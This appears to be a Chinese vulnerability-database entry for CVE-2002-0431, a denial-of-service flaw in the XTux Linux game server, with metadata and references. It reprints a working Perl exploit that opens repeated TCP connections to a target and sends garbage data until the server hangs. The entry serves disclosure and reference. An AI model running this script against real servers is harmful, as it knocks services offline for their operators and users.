XTux垃圾信息产生拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106639 漏洞类型 其他
发布时间 2002-03-09 更新时间 2006-04-18
CVE编号 CVE-2002-0431 CNNVD-ID CNNVD-200207-098
漏洞平台 Linux CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/21338
https://www.securityfocus.com/bid/4260
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200207-098
|漏洞详情
XTux是一款多用户网络游戏,运行在linux操作系统平台下。XTux存在一个拒绝服务漏洞,远程攻击者利用此问题导致拒绝服务攻击。通过连接XTux服务器并发送随意的垃圾字符,可导致cpu利用率达到70%以上,从而造成拒绝服务攻击。
|漏洞EXP
source: http://www.securityfocus.com/bid/4260/info

XTux is a multiplayer network game for Linux. The server component (June 01, 2001 version) is vulnerable to a denial of service initiated by connecting to the server and sending unexpected characters. This causes the server to become unresponsive and consume resources. 

#!/usr/bin/perl
#
# xtux server DoS - by b0iler
# server will become unresponcive and takes up lots of CPU.

use IO::Socket;

for($n=0;$n<=3;$n++){ #you shouldn't even need all 3 connections.
        print "Connecting to $ARGV[0] port $ARGV[1]\n";
        $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],  PeerPort =>
$ARGV[1], Proto    => 'tcp' ) or print "\ncouldn't connect\n\n";
        sleep 3;
        print $sock "garbage data\n\n";
}
exit;
|受影响的产品
Dave Lawrence XTux 2001.0 6.01 - Linux kernel 2.4.18
|参考资料

来源:BID
名称:4260
链接:http://www.securityfocus.com/bid/4260
来源:XF
名称:xtux-server-dos(8422)
链接:http://www.iss.net/security_center/static/8422.php
来源:BUGTRAQ
名称:20020309xtuxserverDoS.
链接:http://online.securityfocus.com/archive/1/260912
来源:sourceforge.net
链接:https://sourceforge.net/tracker/index.php?func=detail&aid=529046&group_id=206&atid=100206